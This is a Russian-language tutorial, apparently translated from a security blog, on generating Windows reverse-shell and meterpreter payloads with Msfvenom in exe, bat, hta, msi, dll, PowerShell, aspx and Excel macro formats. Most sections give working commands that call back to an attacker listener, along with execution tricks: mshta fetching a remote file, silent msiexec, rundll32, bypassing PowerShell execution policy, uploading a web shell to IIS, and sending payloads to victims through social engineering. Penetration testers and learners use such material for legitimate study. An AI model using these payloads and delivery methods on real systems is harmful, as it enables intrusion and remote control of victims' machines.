Найти тему

Гайд по Msfvenom: эксплуатация Windows

Оглавление

В этой статье пойдет речь о Msfvenom. Инструмент отлично подходит для создания всех типов полезных нагрузок для платформы Windows.

Введение

Платформы, которые потребуются читателю, для осуществления практических действий:

  • Kali Linux
  • Windows

Msfvenom – это автономный генератор полезных нагрузок Metasploit, который также способен заменить msfpayload и msfencode.

Его синтаксис:

msfvenom -p (payload type) lhost=(Listening's_IP) lport=(Listening_Port) -f (Filetype) > (Output Filename)

Типы полезных нагрузок

Полезная нагрузка – это вредоносный скрипт, который злоумышленник использует для взаимодействия с целевой машиной с целью ее компрометации. Msfvenom поддерживает следующую платформу и формат для создания полезных нагрузок. Формат вывода данных может соответствовать исполняемым файлам, таким как .exe, .php, .dll, или быть представлен в виде однострочного файла.

Есть два основных типа полезных нагрузок.

  • Stager: они обычно идентифицируются слэшем (/), к примеру: «windows/meterpreter/reverse_tcp»;
  • Stageless: используется «_» вместе второго знака «/» в имени полезной нагрузки, к примеру: «windows/meterpreter_reverse_tcp».
-2

Как уже было сказано выше, эта статья поможет изучить все возможные методы создания различных форматов полезной нагрузки для платформы Windows.

Исполняемая полезная нагрузка (.exe)

  • Тип полезной нагрузки: Stager

Выполнение следующей команды для создания вредоносного exe-файла даст возможность получить исполняемый файл для Microsoft Windows:

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f exe > shell.exe

Весь вредоносный код будет записан внутри «shell.exe» файла и выполнен в виде exe-программы на целевой машине.

-3

Следует поделиться этим файлом с целью, используя методы социальной инженерии, и дождаться его запуска. Помимо этого, необходимо запустить Netcat в качестве листенера для захвата обратного соединения.

nc –lvp 443

-4

Пакетный файл Powershell

  • Тип полезной нагрузки: Stager

Пользователь выполнит следующую команду для создания вредоносного пакетного файла (с расширением .bat) для DOS и Windows:

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.3 lport=443 > shell.bat

Весь вредоносный код будет записан внутри файла «shell.bat» и выполнен в виде bat-скрипта на целевой машине.

-5

Следует поделиться этим файлом с целью, используя методы социальной инженерии, и дождаться его запуска. Помимо этого, необходимо запустить Netcat в качестве листенера для захвата обратного соединения.

nc –lvp 443

-6

Полезная нагрузка HTML Application (HTA)

  • Тип полезной нагрузки: Stager

HTML-приложение (HTA) – это программа в Microsoft Windows, исходный код которой состоит из HTML, динамического HTML и одного или нескольких языков скриптов, поддерживаемых Internet Explorer, таких как VBScript или JScript.

Пользователь выполнит следующую команду, чтобы создать вредоносный HTA-файл, который используется для DOS и Windows.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

Весь вредоносный код будет записан внутри файла «shell.hta» и выполнен в виде hta-скрипта на целевой машине. Помимо этого, пользователь будет использовать HTTP-сервер Python для обмена файлами.

-7

mshta http://192.168.1.3/shell.hta

HTA будет выполнен с помощью программы «mshta.exe» или двойным щелчком по файлу.

-8

Это приведет к получению обратного соединения через листенер Netcat, который работал в фоновом режиме для его захвата.

nc –lvp 443

-9

Полезная нагрузка Microsoft Installer (MSI)

Установщик Windows также известен как установщик Microsoft. Файл MSI –  это пакет Windows, который предоставляет информацию об установке, например, новых программ или инструментов. Его можно использовать для установки обновлений Windows или стороннего программного обеспечения в формате .exe.

Пользователь выполнит следующую команду, чтобы создать вредоносный MSI-файл, который используется для DOS и Windows. Он перенесет вредоносное ПО в целевую систему и запустит его.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f msi > shell.msi

-10

Нужно использовать команду «msiexec» для запуска MSI-файла:

msiexec /quiet /qn /i shell.msi

Это приведет к получению обратного соединения через листенер Netcat, который работал в фоновом режиме для его захвата.

-11
  • Тип полезной нагрузки: Stager

Библиотека DLL – это библиотека, которая содержит код и данные, что могут использоваться несколькими программами.

Пользователь выполнит следующую команду, чтобы создать вредоносный dll-файл, который используется для DOS и Windows. Он перенесет вредоносное ПО в целевую систему и выполнит его.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f dll > shell.dll

-12

Следует использовать команду «rundll32» для запуска MSI-файла:

rundll32.exe shell.dll,0

Это приведет к получению обратного соединения через листенер Netcat, который работал в фоновом режиме для его захвата.

-13

Полезная нагрузка Powershell (psh-cmd)

  • Тип полезной нагрузки: Stager
  • Формат: psh, psh-net, psh-reflection, psh-cmd

Сгенерированные полезные нагрузки в формате «psh», «psh-net» и «psh- reflection» имеют расширение «.ps1», а сгенерированные полезные нагрузки в формате «psh-cmd» получают другое расширение – «.cmd». Помимо этого, пользователь может напрямую выполнить исходный код в командной строке целевой системы.

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.3 lport=443 -f psh-cmd > -f raw

Пользователь выполнит данную команду, чтобы сгенерировать исходный код для вредоносной программы PowerShell.

-14

Для выполнения следует скопировать сгенерированный код и вставить его в командную строку Windows.

Это приведет к получению обратного соединения через листенер Netcat, который работал в фоновом режиме для его захвата.

-15

Полезная нагрузка Powershell (ps1)

  • Тип полезной нагрузки: Stager

Файл PS1 – это скрипт или «cmdlet», используемый Windows PowerShell. Файлы PS1 похожи на файлы формата «.BAT» и «.CMD», за исключением того, что они выполняются в PowerShell вместо командной строки Windows.

Пользователь выполнит следующую команду, чтобы создать вредоносный сценарий PS1 с расширением имени файла «.PS1», что используется в Windows PowerShell:

msfvenom -p windows/x64/meterpreter_reverse_https lhost=192.168.1.3 lport=443 -f psh > shell.ps1

Поскольку тип обратного Shell – meterpreter, необходимо запустить exploit/multi/handler внутри фреймворка Metasploit.

-16

Политика выполнения PowerShell – это функция безопасности, которая управляет условиями, при которых PowerShell загружает файлы конфигурации и запускает скрипты. Данная функция помогает предотвратить выполнение вредоносных скриптов. Она предотвращает запуск всех файлов скриптов, включая файлы форматирования и конфигурации (.ps1xml), файлы скриптов модулей (.psm1) и профили PowerShell (.ps1).

Чтобы выполнить скрипт PS1, необходимо обойти политику выполнения, выполнив следующую команду в Windows PowerShell и запустив то, что нужно:

PowerShell –ep bypass
.\shell.ps1

-17

msfconsole
use exploit/multi/handler
set lhost 192.168.1.3
set lport 443
set payload windows/x64/meterpreter_reverse_https

Как только цель запустит скрипт «shell.ps1», хакер получит обратное соединение через сеанс meterpreter.

-18

Полезная нагрузка Web shell (ASPX)

  • Тип полезной нагрузки: Stageless

ASPX-файл – это файл Active Server Page Extended для платформы Microsoft ASP.NET. При просмотре URL-адреса страницы отображаются в веб-браузере пользователя, веб-формы .NET – их другое название.

Пользователь выполнит следующую команду, чтобы создать вредоносный скрипт-aspx с соответствующим расширением:

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.3 lport=443 -f aspx > shell.aspx

Поскольку тип обратного Shell – meterpreter, необходимо запустить exploit/multi/handler внутри фреймворка Metasploit.

-19

Пользователь может ввести эту полезную нагрузку для использования уязвимости Unrestricted File Upload, если целью является веб-сервер IIS.

-20

Пользователь выполняет скрипт загрузки в веб-браузере.

-21

msfconsole
use exploit/multi/handler
set lhost 192.168.1.3
set lport 443
set payload windows/x64/meterpreter_reverse_https

Как только хакер выполнит вредоносный скрипт, он получит обратное соединение через сеанс meterpreter.

Полезная нагрузка Visual Basic (.vba)

  • Тип полезной нагрузки: Stageless

VBA – это расширение файла, обычно ассоциируемое с Visual Basic, что поддерживает приложения Microsoft, такие как Microsoft Excel, Office, PowerPoint, Word и Publisher. Он используется для создания «макросов». что выполняются в Excel. Хакер пользуется привилегиями этих функций и создает вредоносный скрипт VB, который будет выполняться в виде программы макросов с помощью Microsoft Excel.

Пользователь выполнит следующую команду, чтобы создать вредоносный скрипт-aspx, который будет выполняться в виде макросов в Microsoft Excel:

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.3 lport=443 -f vba

-22

Теперь пользователь открывает его Workbook, в который введены вредоносные макросы.

-23

Как только хакер выполнит вредоносный скрипт, он получит обратное соединение через сеанс meterepreter.

-24

Автор переведённой статьи: Aarti Singh.

Важно! Информация исключительно в учебных целях. Пожалуйста, соблюдайте законодательство и не применяйте данную информацию в незаконных целях.

Больше интересного материала на cisoclub.ru. Подписывайтесь на нас: Facebook | VK | Twitter | Instagram | Telegram | Дзен | Мессенджер | ICQ New | YouTube | Pulse.